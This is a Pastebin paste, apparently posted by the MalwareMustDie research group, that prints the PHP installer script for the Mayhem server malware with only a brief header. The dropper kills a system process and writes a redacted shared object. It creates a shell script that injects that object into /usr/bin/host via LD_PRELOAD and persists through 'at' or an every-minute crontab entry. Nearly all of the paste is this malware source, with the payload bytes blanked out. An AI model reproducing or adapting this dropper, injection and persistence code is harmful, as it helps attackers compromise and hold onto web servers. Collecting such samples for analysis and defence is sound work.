daily pastebin goal
48%
SHARE
TWEET

#Mayhem Installer | latest one

MalwareMustDie Jul 27th, 2014 336 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #MalwareMustDie | ScrapNote
  2. #Mayhem script installer.
  3. #Case:
  4. https://twitter.com/MalwareMustDie/status/492572445744721921 …
  5. https://twitter.com/MalwareMustDie/status/492556259996876800 …
  6. https://twitter.com/MalwareMustDie/status/492578929232707584 …
  7.  
  8. # codes:
  9.  
  10. <?php
  11.  
  12. header("Content-type: text/plain");
  13.  
  14. if (! function_exists('file_put_contents')) {
  15.         function file_put_contents($filename, $data) {
  16.                 $f = @fopen($filename, 'w');
  17.                 if (! $f)
  18.                         return false;
  19.                 $bytes = fwrite($f, $data);
  20.                 fclose($f);
  21.                 return $bytes;
  22.         }
  23. }
  24.  
  25. @system("killall -9 ".basename("/usr/bin/host"));
  26.  
  27. $so32="xxxxxxxxxxxxxx"
  28. $so64="xxxxxxxxxxxxxx"
  29.  
  30. $arch = 64;
  31. if (intval("9223372036854775807") == 2147483647)
  32.         $arch = 32;
  33. print "Arch is ".$arch."\n";
  34. $so = $arch == 32 ? $so32 : $so64;
  35. $f = fopen("/usr/bin/host", "rb");
  36. if ($f) {
  37.         $n = unpack("C*", fread($f, 8));
  38.         $so[7] = sprintf("%c", $n[8]);
  39.         print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
  40.         fclose($f);
  41. }
  42. print "SO dumped ".file_put_contents("./atom-aggregator.so", $so)."\n";
  43. if (getenv("MAYHEM_DEBUG"))
  44.         exit(0);
  45. $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  46. /* second stage dropper */
  47. $HBN=basename("/usr/bin/host");
  48. $SCP=getcwd();
  49. $SCR  ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './atom-aggregator.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./atom-aggregator.so\n/usr/bin/host\nunset LD_PRELOAD\n";
  50. $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
  51. @file_put_contents("1.sh", $SCR);
  52. @chmod("1.sh", 0777);
  53. /* try at now, file will be removed, crontab cleaned on success */
  54. @system("at now -f 1.sh", $ret);
  55. if ($ret == 0) {
  56.         for ($i = 0; $i < 5; $i++) {
  57.                 if (! @file_exists("1.sh")) {
  58.                         print "AT success\n";
  59.                         exit(0);
  60.                 }
  61.                 sleep(1);
  62.         }
  63. }
  64. @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
  65. if ($ret == 0) {
  66.         for ($i = 0; $i < 62; $i++) {
  67.                 if (! @file_exists("1.sh")) {
  68.                         print "CRONTAB success\n";
  69.                         exit(0);
  70.                 }
  71.                 sleep(1);
  72.         }
  73. }
  74. print "Running straight\n";
  75. @system("./1.sh");
  76.  
  77. ?>
  78.  
  79. -----
  80. #MalwareMustDie | Collected by @unixfreaxjp
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top